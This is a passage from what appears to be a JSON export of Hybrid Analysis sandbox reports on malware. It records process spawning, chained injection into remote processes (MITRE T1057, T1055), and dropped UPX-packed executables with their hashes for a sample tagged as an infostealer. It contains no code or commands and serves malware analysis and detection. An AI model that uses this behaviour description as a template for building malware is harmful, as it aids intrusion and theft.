00000000-00002976)\n Spawned process \"8486482.exe\" (UID: 00000000-00003204)\n Spawned process \"202808.exe\" (UID: 00000000-00004104)\n Spawned process \"fjhdxhf.exe\" (UID: 00000000-00003556)\n Spawned process \"vnhnhxx.exe\" (UID: 00000000-00003680)\n Spawned process \"dfllnjr.exe\" (UID: 00000000-00002784)\n Spawned process \"hlrtth.exe\" (UID: 00000000-00004100)\n Spawned process \"fhjttl.exe\" (UID: 00000000-00004172)\n Spawned process \"22624.exe\" (UID: 00000000-00004092)\n Spawned process \"06668.exe\" (UID: 00000000-00002756)\n Spawned process \"482820.exe\" (UID: 00000000-00003804)\n Spawned process \"840062.exe\" (UID: 00000000-00003708)\n Spawned process \"btvjnxf.exe\" (UID: 00000000-00000272)\n Spawned process \"vbtfdd.exe\" (UID: 00000000-00002580)\n Spawned process \"nlrvnpx.exe\" (UID: 00000000-00000328)\n Spawned process \"xvprxbd.exe\" (UID: 00000000-00000900)\n Spawned process \"vdphh.exe\" (UID: 00000000-00002832)\n Spawned process \"0484008.exe\" (UID: 00000000-00002836)\n Spawned process \"88060.exe\" (UID: 00000000-00004080)\n Spawned process \"8084222.exe\" (UID: 00000000-00000416)\n Spawned process \"4220002.exe\" (UID: 00000000-00003876)\n Spawned process \"44206.exe\" (UID: 00000000-00000864)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" wrote 32 bytes to a remote process \"C:\\0004664.exe\" (Handle: 64)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" wrote 52 bytes to a remote process \"C:\\0004664.exe\" (Handle: 64)\n \"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" wrote 4 bytes to a remote process \"C:\\0004664.exe\" (Handle: 64)\n \"0004664.exe\" wrote 32 bytes to a remote process \"C:\\4060800.exe\" (Handle: 68)\n \"0004664.exe\" wrote 52 bytes to a remote process \"C:\\4060800.exe\" (Handle: 68)\n \"0004664.exe\" wrote 4 bytes to a remote process \"C:\\4060800.exe\" (Handle: 68)\n \"4060800.exe\" wrote 32 bytes to a remote process \"C:\\482642.exe\" (Handle: 112)\n \"4060800.exe\" wrote 52 bytes to a remote process \"C:\\482642.exe\" (Handle: 112)\n \"4060800.exe\" wrote 4 bytes to a remote process \"C:\\482642.exe\" (Handle: 112)\n \"482642.exe\" wrote 32 bytes to a remote process \"C:\\lthxxd.exe\" (Handle: 120)\n \"482642.exe\" wrote 52 bytes to a remote process \"C:\\lthxxd.exe\" (Handle: 120)\n \"482642.exe\" wrote 4 bytes to a remote process \"C:\\lthxxd.exe\" (Handle: 120)\n \"lthxxd.exe\" wrote 32 bytes to a remote process \"C:\\bbpbfhd.exe\" (Handle: 68)\n \"lthxxd.exe\" wrote 52 bytes to a remote process \"C:\\bbpbfhd.exe\" (Handle: 68)\n \"lthxxd.exe\" wrote 4 bytes to a remote process \"C:\\bbpbfhd.exe\" (Handle: 68)\n \"bbpbfhd.exe\" wrote 32 bytes to a remote process \"C:\\ntpbdh.exe\" (Handle: 116)\n \"bbpbfhd.exe\" wrote 52 bytes to a remote process \"C:\\ntpbdh.exe\" (Handle: 116)\n \"bbpbfhd.exe\" wrote 4 bytes to a remote process \"C:\\ntpbdh.exe\" (Handle: 116)\n \"ntpbdh.exe\" wrote 32 bytes to a remote process \"C:\\rrjxnjh.exe\" (Handle: 116)\n \"ntpbdh.exe\" wrote 52 bytes to a remote process \"C:\\rrjxnjh.exe\" (Handle: 116)\n \"ntpbdh.exe\" wrote 4 bytes to a remote process \"C:\\rrjxnjh.exe\" (Handle: 116)\n \"rrjxnjh.exe\" wrote 32 bytes to a remote process \"C:\\004422.exe\" (Handle: 116)\n \"rrjxnjh.exe\" wrote 52 bytes to a remote process \"C:\\004422.exe\" (Handle: 116)\n \"rrjxnjh.exe\" wrote 4 bytes to a remote process \"C:\\004422.exe\" (Handle: 116)\n \"004422.exe\" wrote 32 bytes to a remote process \"C:\\rlrbxrl.exe\" (Handle: 120)\n \"004422.exe\" wrote 52 bytes to a remote process \"C:\\rlrbxrl.exe\" (Handle: 120)\n \"004422.exe\" wrote 4 bytes to a remote process \"C:\\rlrbxrl.exe\" (Handle: 120)\n \"rlrbxrl.exe\" wrote 32 bytes to a remote process \"C:\\pnrdltb.exe\" (Handle: 116)\n \"rlrbxrl.exe\" wrote 52 bytes to a remote process \"C:\\pnrdltb.exe\" (Handle: 116)\n \"rlrbxrl.exe\" wrote 4 bytes to a remote process \"C:\\pnrdltb.exe\" (Handle: 116)\n \"pnrdltb.exe\" wrote 32 bytes to a remote process \"C:\\hvjhb.exe\" (Handle: 68)\n \"pnrdltb.exe\" wrote 52 bytes to a remote process \"C:\\hvjhb.exe\" (Handle: 68)\n \"pnrdltb.exe\" wrote 4 bytes to a remote process \"C:\\hvjhb.exe\" (Handle: 68)\n \"hvjhb.exe\" wrote 32 bytes to a remote process \"C:\\xnpjdph.exe\" (Handle: 116)\n \"hvjhb.exe\" wrote 52 bytes to a remote process \"C:\\xnpjdph.exe\" (Handle: 116)\n \"hvjhb.exe\" wrote 4 bytes to a remote process \"C:\\xnpjdph.exe\" (Handle: 116)\n \"xnpjdph.exe\" wrote 32 bytes to a remote process \"C:\\024648.exe\" (Handle: 108)\n \"xnpjdph.exe\" wrote 52 bytes to a remote process \"C:\\024648.exe\" (Handle: 108)\n \"xnpjdph.exe\" wrote 4 bytes to a remote process \"C:\\024648.exe\" (Handle: 108)\n \"024648.exe\" wrote 32 bytes to a remote process \"C:\\640660.exe\" (Handle: 68)\n \"024648.exe\" wrote 52 bytes to a remote process \"C:\\640660.exe\" (Handle: 68)\n \"024648.exe\" wrote 4 bytes to a remote process \"C:\\640660.exe\" (Handle: 68)\n \"640660.exe\" wrote 32 bytes to a remote process \"C:\\22404.exe\" (Handle: 120)\n \"640660.exe\" wrote 52 bytes to a remote process \"C:\\22404.exe\" (Handle: 120)\n \"640660.exe\" wrote 4 bytes to a remote process \"C:\\22404.exe\" (Handle: 120)\n \"22404.exe\" wrote 32 bytes to a remote process \"C:\\4862082.exe\" (Handle: 68)\n \"22404.exe\" wrote 52 bytes to a remote process \"C:\\4862082.exe\" (Handle: 68)\n \"22404.exe\" wrote 4 bytes to a remote process \"C:\\4862082.exe\" (Handle: 68)\n \"4862082.exe\" wrote 32 bytes to a remote process \"C:\\fnvpbxr.exe\" (Handle: 68)\n \"4862082.exe\" wrote 52 bytes to a remote process \"C:\\fnvpbxr.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"vnhnhxx.exe\" allocated memory in \"c:\\vnhnhxx.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1
https://hybrid-analysis.com/sample/48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1
Hybrid Analysis - Infostealers
{"size": 49104, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1", "sha256": "48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1", "av_detect": 95, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 112, "extracted_files": [{"name": "004802.exe", "file_path": "C:\\004802.exe", "file_size": 49812, "sha256": "da84529729dbdae027dbb3481b54035a4587527de2905c9c2db2e9b797dde4aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "004802.exe (PID: 2836)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "020864.exe", "file_path": "C:\\020864.exe", "file_size": 49960, "sha256": "dbb66a6b8a3ba69e5a513fc94011097ef830317befdca237f10e83990a71631a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "020864.exe (PID: 884)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "026026.exe", "file_path": "C:\\026026.exe", "file_size": 49118, "sha256": "27fa97cdbe3414f74ce773f1ff2eb2b5c65160adf3a0435fdb88b9d8a11130f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe (PID: 5728)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "040208.exe", "file_path": "C:\\040208.exe", "file_size": 50008, "sha256": "72d74ff09b024653a3ab4923e655a0512266a4628227e45f03655fd898b9227c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "040208.exe (PID: 4588)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "044866.exe", "file_path": "C:\\044866.exe", "file_size": 49982, "sha256": "2c5d62297b61edc3f53f2cdd7c4494b0cb051ed53da626e51969cfd42b345b3b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "84604.exe (PID: 3824)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "046644.exe", "file_path": "C:\\046644.exe", "file_size": 49528, "sha256": "7a5b725dbedadc7f3fac2b3fb00e286ae9fb79ec1151b6d1b1bc32f03ff46dd9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "046644.exe (PID: 4140)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0484046.exe", "file_path": "C:\\0484046.exe", "file_size": 49270, "sha256": "711d555e86302c08744e51882881a19a16ec731f43ddf5874592795257e9d7fa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8288862.exe (PID: 6084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "06200.exe", "file_path": "C:\\06200.exe", "file_size": 49244, "sha256": "37e6e0780cc1b92ef199fd5cf1d16ad3a737978b5f49b12422a9f57aadf24ab1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "068466.exe (PID: 2260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "068466.exe", "file_path": "C:\\068466.exe", "file_size": 49227, "sha256": "044da255c0a7811b55e26b9d269897455c348eda4de329109096c2dee464fc9d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "068466.exe (PID: 2260)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2006628.exe", "file_path": "C:\\2006628.exe", "file_size": 49578, "sha256": "920cc5e4f7b932865026b579990501ffb3d2d8bc3a39cac48ff6e29e4ba13874", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8600684.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20402.exe", "file_path": "C:\\20402.exe", "file_size": 49508, "sha256": "303bfc13e48288e6b1bf1897e2ea53bec32b07242a488d517a3277275fbe5bdf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4228006.exe (PID: 1372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "22428.exe", "file_path": "C:\\22428.exe", "file_size": 49180, "sha256": "28f207fce2603f5e8b7f722bf768f78672e517dfa600ecfb6130178901448f20", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbvtbl.exe (PID: 5956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2628204.exe", "file_path": "C:\\2628204.exe", "file_size": 49792, "sha256": "115355f3db17c705430952c6f17e7b20d836a2cd00b0e9e80465204e13b23ec3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2628204.exe (PID: 1888)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2820044.exe", "file_path": "C:\\2820044.exe", "file_size": 49543, "sha256": "55ef709c4df14fd47b9626b8b07aa5d5c9b828c511b14291952144c9eed75527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2820044.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "42004.exe", "file_path": "C:\\42004.exe", "file_size": 49764, "sha256": "91b8f4f1532e2c5252d25153d990084bbbf64a26cb11435a9adafaef7a8a8215", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42004.exe (PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4228006.exe", "file_path": "C:\\4228006.exe", "file_size": 49498, "sha256": "1bd9b8a3df7d685146986d1feca0925e4ebb96304e5e5ebc01c6fc8618d3f945", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4228006.exe (PID: 1372)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4640842.exe", "file_path": "C:\\4640842.exe", "file_size": 49216, "sha256": "c4d7e8052fe26c721b192fb9ba5a4f0f999ade20a2c5e25857caf91c1e116771", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66488.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "624082.exe", "file_path": "C:\\624082.exe", "file_size": 49745, "sha256": "f2e4d15d422eac81a815b796344c5ea35576d21abfaff4a2e0681653f6a201ff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rhjvpvp.exe (PID: 1844)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "624206.exe", "file_path": "C:\\624206.exe", "file_size": 49994, "sha256": "1fd66959ec2a5ceca929d40d6d9e749b1c2e27980d07a11fd23b336bfc0fc72d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "044866.exe (PID: 4576)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "64860.exe", "file_path": "C:\\64860.exe", "file_size": 49590, "sha256": "b3634bf794c63759f6248f375f94f99e845eed4450e3d4bc309d479be3022b15", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "64860.exe (PID: 3220)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "66488.exe", "file_path": "C:\\66488.exe", "file_size": 49199, "sha256": "4b7705150a79580d8a80db040042a3270651259d6e54c29aa13589fc597599f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "66488.exe (PID: 3512)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "806004.exe", "file_path": "C:\\806004.exe", "file_size": 49480, "sha256": "bbb6f8de8cd9cadfa6260e1f4e7d00e964b6cc873bf2c889a199a1b83a4b3fc2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "806004.exe (PID: 4472)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8288862.exe", "file_path": "C:\\8288862.exe", "file_size": 49259, "sha256": "288b0558b46602ea35d03fabac3b89b716653a1eab6aa32fda7f4abfc28f4688", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8288862.exe (PID: 6084)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "84604.exe", "file_path": "C:\\84604.exe", "file_size": 49971, "sha256": "fd256e5b8cef203dd7d21fc1cc83834ab83bd9b0a5cb829278fa4fdf29eb3ad0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "020864.exe (PID: 884)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8600684.exe", "file_path": "C:\\8600684.exe", "file_size": 49559, "sha256": "4034203a37e672cc5104a3d854c61f40242bdcd01fe79ac85635abd960a81779", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2820044.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "884228.exe", "file_path": "C:\\884228.exe", "file_size": 49775, "sha256": "cd6e94112ddb1237dbb7e26a3d724500685b372c50171829ff3eec8d934bec59", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "42004.exe (PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bfllh.exe", "file_path": "C:\\bfllh.exe", "file_size": 49349, "sha256": "8f15f9cdba48adc91a3c967ef4bccd861edeba8120d480bc044f44a48a6611ee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "frbnxt.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dllffdl.exe", "file_path": "C:\\dllffdl.exe", "file_size": 49822, "sha256": "93cffd7e0752dd33e56f1ce933d523e5146657f45e23a306b8dd3f7b07a9a00d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "004802.exe (PID: 2836)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dpjjvjv.exe", "file_path": "C:\\dpjjvjv.exe", "file_size": 49621, "sha256": "886530c4bb8c743ea2ebe213791058bf698fcaf33b3d5879e80da48ef3156ba5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fpplvv.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "drpdftl.exe", "file_path": "C:\\drpdftl.exe", "file_size": 49304, "sha256": "5d6d097e4274a3d49bd8d3c98221f06e6ce47e84fa4cc7ade39b14d31d1ae24c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tpjrfn.exe (PID: 848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fpplvv.exe", "file_path": "C:\\fpplvv.exe", "file_size": 49601, "sha256": "9fe865ebc8e99823818bd38bd9328d8646f2f8507fe04b9df7646298fd6815b8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fpplvv.exe (PID: 4124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frbnxt.exe", "file_path": "C:\\frbnxt.exe", "file_size": 49329, "sha256": "76e46304cbc0ebc0b9d5f4ae5cfcbdee563283ffc94b21c9873308120acecacf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "frbnxt.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "frrtbb.exe", "file_path": "C:\\frrtbb.exe", "file_size": 50052, "sha256": "78e6c499eb2045bc8607dc5726e47b91acb2e50c74eba663193fda1ae400f702", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvjlh.exe (PID: 4360)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvjlh.exe", "file_path": "C:\\fvjlh.exe", "file_size": 50041, "sha256": "2e4426e9d3ca5c30ece0e26dcfaccfa64f666d736aebed1b7ce201ab5a00be7a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "fvjlh.exe (PID: 4360)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hfxjvn.exe", "file_path": "C:\\hfxjvn.exe", "file_size": 49131, "sha256": "e0b7fcae1e7e52e115171e04df090075d8e243435ded7330d445aa0444ecc103", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "026026.exe (PID: 5860)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hjjtjd.exe", "file_path": "C:\\hjjtjd.exe", "file_size": 49661, "sha256": "b9f426d3995b9b31a4d4536fe2abd82ae1ae2b10e767a6f39643e3c3c7e7096a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tlbnpbh.exe (PID: 3424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hptntt.exe", "file_path": "C:\\hptntt.exe", "file_size": 49364, "sha256": "6655285797355328eba0c2be431559a24bfe8b6496795ea54950fed98c7908f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bfllh.exe (PID: 2096)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "htpdr.exe", "file_path": "C:\\htpdr.exe", "file_size": 49319, "sha256": "2859130f9bfad5462f5364ef111bf341eb7b44e0226ad45afa16686b283f4f93", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "htpdr.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jrrhxbf.exe", "file_path": "C:\\jrrhxbf.exe", "file_size": 49692, "sha256": "ca21d7ce771fe64716db89820066517b8eb115cc0893dcc9bee564acbc5fd46a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rpbfjr.exe (PID: 4236)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbvtbl.exe", "file_path": "C:\\lbvtbl.exe", "file_size": 49169, "sha256": "3e46b069747e996ce9286294844e291f7508d07c47a3f5035c42273dec59cb7a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lbvtbl.exe (PID: 5956)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lfhtd.exe", "file_path": "C:\\lfhtd.exe", "file_size": 49902, "sha256": "921cba4d7acaf218e0bfa541f0bc2d17b8096f1d4b3f589d256282191cee1755", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "prbhn.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lfnjxdh.exe", "file_path": "C:\\lfnjxdh.exe", "file_size": 49707, "sha256": "fc89faaba9b2add6703510092d98d200d9fae724d9dc91be7509c74bf3775803", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lfnjxdh.exe (PID: 4524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ljvfrdn.exe", "file_path": "C:\\ljvfrdn.exe", "file_size": 49407, "sha256": "49b28b0f5dc040b8a76c3c2ffc40cf7925af722ca7c85a158c1a9aabbc7c9fb2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rdttflx.exe (PID: 852)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lllfpll.exe", "file_path": "C:\\lllfpll.exe", "file_size": 49429, "sha256": "e855d475e02aedf7cf8022baec8bb4b737a02650aba1b349f13a00c3009e6bae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ntjvt.exe (PID: 2736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxrhrth.exe", "file_path": "C:\\lxrhrth.exe", "file_size": 49446, "sha256": "21e53441d51326ab7a2d45d7b2dac608fc8ee129712c0ce0ebb4ca0e5dfcde46", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxrhrth.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nbnxn.exe", "file_path": "C:\\nbnxn.exe", "file_size": 49718, "sha256": "d15cce74e708cdf43fe87069af8acc1103caef3695d6bfcc58c7276b2e187521", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nbnxn.exe (PID: 4020)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nntvf.exe", "file_path": "C:\\nntvf.exe", "file_size": 49460, "sha256": "23702eff2ee1c8f1731e9260b3fa9f897a960438f5f68d51e45ce02e4ac20fd5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lxrhrth.exe (PID: 3668)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ntjvt.exe", "file_path": "C:\\ntjvt.exe", "file_size": 49419, "sha256": "e64347875c417eb06046903a762877880da3673665daf79fbb7a5837b70d6faf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ljvfrdn.exe (PID: 4448)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxnhll.exe", "file_path": "C:\\nxnhll.exe", "file_size": 49931, "sha256": "e40b1c2fda8ee6101772031d630ab85a2ddc73185b0cdba511842780bc1688ab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pxvdt.exe (PID: 872)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pbnblrt.exe", "file_path": "C:\\pbnblrt.exe", "file_size": 49857, "sha256": "1b67cc00cb4632da36c6a8e90e20bf795747317124b7ae538136cdf59deca898", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pbnblrt.exe (PID: 3228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "prbhn.exe", "file_path": "C:\\prbhn.exe", "file_size": 49888, "sha256": "c984dc5e098816bb470a86194ea1d8200951303d392dfa8a11b08d3444d05967", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vrjppt.exe (PID: 1920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pxvdt.exe", "file_path": "C:\\pxvdt.exe", "file_size": 49913, "sha256": "620ceaea22fa46a75123ae59ff9bfaec1e30d2ca16c44f33fd071f2f98207b5e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pxvdt.exe (PID: 872)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdttflx.exe", "file_path": "C:\\rdttflx.exe", "file_size": 49394, "sha256": "9adcbb9126fcbeb63f07611dda6b1486116b8d5ce912129daa8d0afda5a8bdea", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rdttflx.exe (PID: 852)", "threat_level_readable": "no specific threat", "file_available_to_download": 